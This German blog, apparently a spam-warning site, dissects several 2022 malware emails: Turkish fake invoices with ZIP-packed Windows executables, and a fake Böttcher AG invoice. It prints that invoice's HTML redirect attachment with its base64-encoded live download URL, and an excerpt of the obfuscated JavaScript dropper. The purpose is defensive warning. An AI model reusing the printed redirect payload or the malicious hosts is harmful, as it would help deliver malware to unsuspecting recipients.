Oft begleitet von einem großen Schaden. Wenn eine Privatperson ihre gesamten Daten verschlüsselt bekommt und von einem Erpresser zum Bezahlen aufgefordert wird, kann das schon schlimm sein. Ich habe schon erwachsene Menschen weinen sehen, als sie auf diese Weise ein 180seitiges Dokument verloren haben und nicht verstehen konnten, dass ich empfehle, trotzdem niemals Geld an Kriminelle zu zahlen, zumal man auch gar nicht weiß, ob man wirklich seine Dateien zurückbekommt. Selbst, wenn es nicht ganz so übel läuft, dass die Masterarbeit verschwunden ist und „nur“ fünfzehn Jahre Fotos, Videos und „Zeug“ verloren gehen, ist das sehr schlimm¹. Ein Unternehmen steht nach einem solchen Angriff am Rande der Insolvenz, wenn sich die (beliebig nachladbare) Schadsoftware wurmartig durchs gesamte Netzwerk des Unternehmens vorarbeitet – von den zusätzlichen Problemen, die dadurch entstehen, dass empfindliche Kundendaten in die Hände schwer krimineller Zeitgenossen fallen, will ich gar nicht erst anfangen. 🤬️

Lasst es nicht dazu kommen! Öffnet niemals einen Anhang einer E-Mail, ohne vorher über einen anderen Kanal als E-Mail rückzufragen, ob der scheinbare Absender – die Absenderangabe einer Mail kann beliebig gefälscht werden – auch der wirkliche Absender ist und ob er diese Mail wirklich versendet hat. Und wenn man gar nicht weiß, wer der Absender ist: Ab in den Müll damit! 🗑️

Aber auch, wenn man wirklich jeden Tag Mails von Unbekannten öffnen muss – etwa Bestellungen, Bewerbungen, Beschwerden von Kunden – gibt es eine einfache Lösung, die ohne Kosten und sofort zu einem erheblichen Zugewinn an Sicherheit führt: Verwendet an solchen Arbeitsplätzen ein anderes Betrübssystem als Microsoft Windows²! Zurzeit richtet sich jeder allgemeine kriminelle Angriff dieser Art gegen Microsoft Windows, weil es nicht nur sehr verbreitet, sondern auch ein „einfaches Ziel“ ist. Gute und für „normale Anwender“ geeignete Mailsoftware gibt es für jedes gegenwärtige Betriebssystem. Auf anderen Betriebssystemen ist es aber nicht ganz so einfach, jemanden eine Datei unterzuschieben, die beim Öffnen den Programmcode von Dritten ausführt, weil die Ausführbarkeit nicht am Dateinamen erkannt wird, sondern an einem Attribut, das im Dateisystem hinterlegt ist und das aktiv vom Anwender gesetzt werden müsste. Natürlich gibt es dann immer noch Probleme mit Makros in Office-Dokumenten, aber da wird ja eine Warnung präsentiert, bevor die Makros geöffnet werden. Und außerdem setzt zurzeit beinahe jede derartige Schadsoftware Microsoft Windows voraus. Die Verwendung eines anderen Betrübssystemes ist ein viel zuverlässigerer Schutz als jedes Antivirusprogramm. 💡️

¹Sichert eure Daten, wenn sie euch etwas bedeuten! Datenträger sind nicht teuer. Software für eine Datensicherung gibt es frei und kostenlos – und natürlich auch oft in einer Form, die auch von „normalen Menschen“ bedient werden kann. Also sichert eure Daten, wenn sie euch etwas bedeuten! Das hilft übrigens nicht nur gegen Kriminelle, sondern auch gegen technische Defekte…

²Es muss übrigens nicht immer Linux sein, auch FreeBSD ist sehr gut, ausgereift und noch etwas robuster gegen Angriffe.

Onaylanmış beyan

Donnerstag, 8. Dezember 2022

⚠️ SCHADSOFTWARE ⚠️ Kötü amaçlı yazılım ⚠️

Auf gar keinen Fall den Anhang öffnen! Postanın ekini asla açmayın! 💀️

Aber ich kann gar kein Türkisch. 😉️

Merhaba,

Genau mein Name!

Firmanıza ait onaylı beyanname görseli ektedir. Kontrol etmeniz rica olunur. Ümit Bey size vergi ve ambar ödeme makbuzlarını ve araç bilgilerini gönderecektir.

İYİ ÇALIŞMALAR

S.Yiğit KOÇAK

ER-AL GÜMRÜK MÜŞAVİRLİĞİ LTD.ŞTİ.

ATAKÖY 7-8-9-10 KISIM MAH. ÇOBANÇEŞME E-5 YANYOL CAD.

NO 18/1 SELENIUM RETRO A BLOK KAT 12 DAİRE 142

BAKIRKÖY / İSTANBUL

TEL: 0212 258 ■■ ■■ -■■ -■■ FAX: 0212 258 ■■ ■■

e-mail: er-al@er-algumruk.com

web: www.er-algumruk.com

Statt irgendwelcher Unterlagen ist im Anhang ein ZIP-Archiv, und das…

$ 7z l Onaylanmış\ beyan.zip 

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=de_DE.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz (306C3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 324409 bytes (317 KiB)

Listing archive: Onaylanmış beyan.zip

--
Path = Onaylanmış beyan.zip
Type = zip
Physical Size = 324409

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2022-12-08 09:22:35 ....A       335789       324231  Onaylanmış beyan.exe
------------------- ----- ------------ ------------  ------------------------
2022-12-08 09:22:35             335789       324231  1 files
$ _

…enthält ebenfalls keine Unterlagen, sondern eine ausführbare Datei für Microsoft Windows. Diese wurde von einem Spammer mit einer irreführend formulierten Spam zugestellt. Man muss nicht lange nachdenken, um zu bemerken, dass es das reinste Gift sein wird. ☣️

Diese klare Schadsoftware wird zurzeit nur von rd. einem Drittel der gängigen Antivirus-Schlangenöle als Schadsoftware erkannt. Zum Glück sollten nahezu hundert Prozent der Gehirne dazu imstande sein, diesen Sondermüll ungelesen in das Tönnchen zu schieben. Oder? ODER? 😱️

Seit Mitte Oktober habe ich immer wieder einmal türkischsprachige Spam im Pesteingang, und die hatte bis jetzt immer einen Schadsoftware-Anhang. Einmal wäre ein Versuch und als solcher nicht aussagekräftig, zweimal ist schon ein Trend und dreimal ist ein Hinweis darauf, dass die Verbrecher glauben, neue Opfer gefunden zu haben und vermutlich auch ganz viel Erfolg bei ihrer neuen „Zielgruppe“ haben. Ich kann leider – trotz meiner Ghetto-Sozialisation am Rande des deutschen Sprachraums mitten in Deutschland – kein Wort Türkisch¹ und deshalb nicht so klar und unmissverständlich warnen wie bei den deutschen Spams mit Schadsoftware. Vom Humor – oder dem, was ich dafür halte – ganz zu schweigen. Wenn ich eine solche Spam an eine deutsche Mailadresse sehe, gehe ich davon aus, dass damit die rd. 2,7 Millionen Menschen türkischer Herkunft², die in der Bundesrepublik Deutschland leben, kriminell überrumpelt werden sollen. Dass diese Menschen, die leider oft nicht so gut deutsch können, über die Machenschaften der Kriminellen gut informiert sind, halte ich für illusorisch. Nicht einmal die Deutschen sind gut genug informiert. ☹️

Und dann werden die Computer der vielen türkischen Gewerbetreibenden eben mit Erpressungstrojanern lahmgelegt, und wer kein Backup hat, muss Bitcoin zahlen, um wieder an die Daten zu kommen. Man kann mit Geld immer etwas Besseres anfangen, als es solchen asozialen Idioten von Spammern zu geben. 💸️

¹Na gut, ein paar Schimpfwörter schon…

²Darunter auch Kurden und andere Minderheiten aus der Türkei, die sich selbst nicht als Türken bezeichnen würden, aber ich habe keine Lust, dafür ein schönes zusammenfassendes Wort zu suchen.

fatura onayı

Dienstag, 25. Oktober 2022

⚠️ Schadsoftware ⚠️ kötü amaçlı yazılım ⚠️

Oh, schon wieder eine Rechnung auf Türkisch? Sollen jetzt die ganzen türkischen Kleinbetriebe um Lösegeld für ihre Daten erpresst werden? Glauben die Spammer, dass „die Türken“ dumm sind und einfach unüberlegt auf alles klicken? 🤔️

Von: Sami Hatipoğlu <shatipoglu@oyakinsaat.com.tr>
An: gammelfleisch@tamagothi.de

Im Töpfchen für Sieger! 🚽️

Merhaba

gerekli düzeltmeleri yapabilmemiz için lütfen talep ettiğiniz faturanın doğru olup olmadığını onaylayın.

İyi iş

Sami HATİPOĞLU

Satınalma Sorumlusu

Tandoğan Projesi

Eti mahallesi GMK Bulvarı No: 138

06570 Çankaya / ANKARA

Tel: (536) 355 xx xx

An der Mail hängt ein Anhang, ein ZIP-Archiv:

$ ls -lh fatura\ onayı.zip 
-rw-r–r– 1 elias elias 203K Okt 25 14:44 'fatura onayı.zip'
$ unzip -l fatura\ onayı.zip 
Archive:  fatura onayı.zip
  Length      Date    Time    Name
———  ———- —–   —-
   219021  2022-10-25 06:03   fatura onayı.exe
———                     ——-
   219021                     1 file
$ _

Mit Stable Diffusion generiertes abstraktes Bild eines gruseligen WesensDer Inhalt ist kein Dokument, sondern eine ausführbare Datei für Microsoft Windows, die unter einem Vorwand zugemailt wurde. Wer darauf doppelklickt und dieses an alle möglichen Mailadressen zugestellte Programm irgendwelcher Verbrecher ausführt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. ☹️

Bitte nicht darauf reinfallen und auf keinen Fall den Anhang öffnen! Lütfen buna kanmayın ve eki asla açmayın! 🖱️🚫️

Wie so oft, gilt auch diesmal: Antivirus-Schlangenöl hilft nicht. Diese aktuelle Schadsoftware wird von weniger als einem Drittel der Antivirus-Programme als Schadsoftware erkannt. Wer sich darauf verlassen hat, ist verlassen. 😱️

Revize fatura

Mittwoch, 19. Oktober 2022

Oh, jetzt werde ich schon auf Türkisch¹ zugespammt? 🤨️

Merhaba

Normalerweise würde ich ja sagen: Genau mein Name! Aber heute sage ich mal: Genau meine Sprache! 🤭️

Fatura önceden onaylandı, lütfen imzalayın ve geri gönderin, böylece ödemelerin ödenmesine başlayalım

İyi iş

Was für eine Rechnung denn? Ich habe nichts gekauft und nichts bestellt. Und wenn der Absender wirklich wollte, dass man eine Rechnung bezahlt, dann würde er schon den Rechnungsbetrag und die Bankverbindung in den Text der Mail schreiben. 🤔️

Aber stattdessen muss ich hier einen Anhang öffnen, wenn ich wissen will, wofür ich wieviel an wen bezahlen soll und um was zum hackenden Henker es überhaupt geht. Einen Anhang in einer E-Mail eines Unbekannten (der Absender kann beliebig gefälscht werden) zu öffnen, ist dumm und gefährlich. ⚠️

Zisan DEMIR
SEMKİM Paint and Chemistry Inc.
Kemalpasa OSB mah. 508 St. No:320
P: 35730; Kemalpasa / IZMIR
M: +09 532 621 ■■■■
T: +90 232 878 ■■■■■
zisandemir@semkim.com.tr
www.semkim.com.tr

Ich bin übrigens der Weihnachtsmann. 🎅️

Es ist hoffentlich jedem Menschen klar, dass ein Krimineller in ein solches Mailimpressum beliebige Daten anderer Menschen und Unternehmen angeben kann. Bei Semkim möchte ich heute jedenfalls nicht am Telefon sitzen, denn ich bin ganz sicher nicht der einzige Empfänger dieser Spam, und das Telefon wird wohl ordentlich bimmeln. Dass dadurch wirtschaftlicher Schaden bei einem unbeteiligten Dritten entsteht, ist einem asozialen kriminellen Spammer egal, wenn dabei nur sein asoziales Geschäft läuft. 🤮️

An der Mail hängt auch nicht etwa ein Dokument, sondern ein ZIP-Archiv mit einer Dateigröße von 241,7 KiB. In diesem Archiv befindet sich auch kein Dokument, sondern…

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 242K Okt 19 15:08 'Revize fatura.zip'
$ unzip -l Revize\ fatura.zip
Archive:  Revize fatura.zip
  Length      Date    Time    Name
———  ———- —–   —-
   261699  2022-10-19 04:53   Revize fatura.exe
———                     ——-
   261699                     1 file
$ unzip Revize\ fatura.zip 
Archive:  Revize fatura.zip
  inflating: Revize fatura.exe       
$ file Revize\ fatura.exe 
Revize fatura.exe: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
$ _

Gruseliges Bild, das mit Stable Diffusion erzeugt wurde…eine ausführbare Datei für Microsoft Windows, die von einem Unbekannten mit einer Lüge zugestellt wurde. Auch, wenn das Piktogramm des Programmes sicherlich wie ein Dokument aussehen wird², damit überhaupt jemand darauf reinfällt: Ein Doppelklick auf die entpackte Datei öffnet kein Dokument, sondern führt das Programm eines Kriminellen aus. Danach steht ein Computer anderer Leute auf dem Schreibtisch. ☹️

Antivirus-Programme helfen nur sehr eingeschränkt. Im Moment wird die klare Schadsoftware nur von einem Fünftel der Antivirus-Programme als Schadsoftware erkannt. 😵️

Wer sich darauf verlässt, durch sein Antivirus-Programm geschützt zu sein, ist in vielen Fällen verlassen. Und das gilt leider sehr regelmäßig. Antivirus-Programme können nur vor Schadsoftware schützen, die bei den Herstellern der Antivirus-Programme schon bekannt ist. Selbst eine für einen analysierenden Menschen sehr ähnlich aussehende Schadsoftware wird regelmäßig nicht erkannt. In solchen an Kleingewerbe und Mittelstand gerichteten Spams wird beinahe immer die neueste Brut der Kriminellen versendet. Denn die Kriminellen sind darauf angewiesen, dass sie Rechner mit ihrer Schadsoftware übernehmen. Sie leben davon. Deshalb wissen solche Kriminelle auch immer recht genau, was von Antivirus-Programmen nicht erkannt wird. Weil sie davon leben, dass es nicht erkannt wird. 😠️

Man kann sich das Antivirus-Schlangenöl in sehr vielen Fällen einfach sparen, wenn man stattdessen vernünftig und sicher mit einem Computer umgeht. Wie man das macht? Das habe ich schon im zuvor verlinkten Text beschrieben. Es ist auch gar nicht so schwierig. Ein sehr wichtiger Bestandteil des vernünftigen und sicheren Umgangs mit Computern ist es, dass man niemals einfach in eine E-Mail klickt. Das schützt nicht nur vor Schadsoftware, sondern auch vor Phishing, dem immer noch häufigsten Trickbetrug im Internet. E-Mail ist sehr praktisch, aber leider auch für Kriminelle. 😐️

Wer sein Gehirn benutzt und einfach keine Anhänge öffnet und keine Links klickt, die ihm per E-Mail zugestellt werden, ohne dass dies über einen anderen Kanal als E-Mail vereinbart wurde, ist auf der sicheren Seite. Es ist kaum möglich, eine giftige Datei unterzuschieben. 🛡️

Noch besser und praktischer im Alltag wäre nur die durchgehende Benutzung (und Überprüfung) digitaler Signaturen, um immer jenseits jedes vernünftigen Zweifels zu wissen, von wem eine E-Mail stammt³. Aber das ist den Menschen leider auch im Jahr 2022 noch zu kompliziert, denn dafür muss man ja klicken können. 🖱️

Erpresser, die Daten verschlüsseln und ein Lösegeld für die Daten erpressen wollen, freuen sich sehr darüber, wenn möglichst viele Menschen digitale Analphabeten sind. Ich meine dieses Wort übrigens nicht als Beschimpfung. Sie haben es einfach nicht gelernt, so wie man zum Beispiel Schreiben und Rechnen lernt, obwohl es eine wichtige Fähigkeit im 21. Jahrhundert wäre. Die tägliche digitale Verdummung von Menschen in Schule, Presse und Glotze ist Kriminalitätsförderung. Gestalten wie Frau Prof. Dr. Kristina Sinemus (CDU), Digitalministerin des Landes Hessen, nebst der korrupten Parteioligarchie, die so viel krachende Inkompetenz aus der lodernden Hirnhölle völliger Ahnungslosigkeit in Amt, Würden und vor allem in die Pfründe gehoben hat, sind offene und schamlose Kriminalitätsförderer. 🤬️

Aber die Verdummung wirkt ja ganz gut, denn so etwas wird leider trotzdem immer wieder gewählt. ☹️

¹Nein, ich kann trotz Ghetto-Sozialisation praktisch kein Türkisch (bis auf ein paar Phrasen und Schimpfwörter), aber DeepL ist sehr hilfreich…

²Ich habe hier kein Programm installiert, mit dem ich die Ressourcen aus einem Windows-Binary extrahieren kann, weil ich so etwas nicht brauche, und ich habe auch keine Lust, jetzt „auf die Schnelle“ ein entsprechendes Programm zu suchen. Ich gehe davon aus, dass entweder das Icon eines Office-Dokumentes oder das Icon eines PDF-Dokumentes verwendet wurde, um den Empfänger über den wahren Dateitypen zu täuschen. Man kann einem ausführbaren Programm für Windows jedes beliebige Icon geben. Diese Spammer leben davon, dass Menschen auf sie reinfallen.

³Eigentlich erfährt man nur, dass die E-Mail von jemanden stammt, der Zugriff auf einen bestimmten privaten Schlüssel hat und dass ihr Text auf dem Transportweg nicht verändert wurde – aber das wäre im Alltag mehr als nur ausreichend und ein hervorragender Ersatz für ein Nichts an rationalen Vertrauensgrundlagen. Die Absenderadresse einer E-Mail kann beliebig gefälscht werden. Man kann einfach reinschreiben, was man möchte, ohne dass das bemerkt wird. Ganz ähnlich, wie man auch auf einen Briefumschlag einen beliebigen Absender schreiben kann, und der Brief kommt trotzdem an.

Ihre Rechnung 146648577349 von der Böttcher AG

Freitag, 30. September 2022

⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️

Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;

So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️

Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️

Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962

Lieber Kunde,

Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️

beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.

Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:

$ cat Rechnung-b-a_0000003198.html 
<body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');">
$ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo 
https://3t8.at/apD8qloS
$ mime-header https://3t8.at/apD8qloS | grep -i ^location
location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf
$ _

Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip
$ zip -sf 5640955135.zip 
Archive contains:
  xi1132111.js
Total 1 entries (418953 bytes)
$ unzip 5640955135.zip 
Archive:  5640955135.zip
  inflating: xi1132111.js  
$ _

Dettelbach ist überall! 😱️

Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…

$ wc xi1132111.js 
     2    373 418953 xi1132111.js
$ _

…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️

Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:

$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo 
function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d',
'\x6a\x70\x66\x57\x51',
'\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c',
'\x56\x6b\x72\x7a\x62',
'\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c',
'\x4f\x6f\x4d\x6c\x57',
'\x4d\x41\x58\x41\x73',
'\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63',
'\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d',
'\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c',
'\x6a\x61\x61\x67\x70',
'\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c',
'\x61\x77\x6e\x6c\x69',
'\x49\x65\x52\x45\x67',
'\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69',
'\x72\x4d\x79\x54\x48',
'\x49\x6d\x77\x47\x67',
'\x42\x69\x74\x77\x49',
'\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b',
'\x77\x7a\x77\x47\x71',
'\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64',
'\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c',
'\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41',
'\x5c\x6f\x5c\x78\x5c\x63\x5c
$ _

Von einem neuronalen Netzwerk generiertes Bild einer verlassenen industriellen Anlage, die überall mit Blut verschmiert istSo etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️

Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️

Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️

Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮‍♂️️

Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.

Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.

Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.

Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.

Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.

Mit freundlichen Grüßen

⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️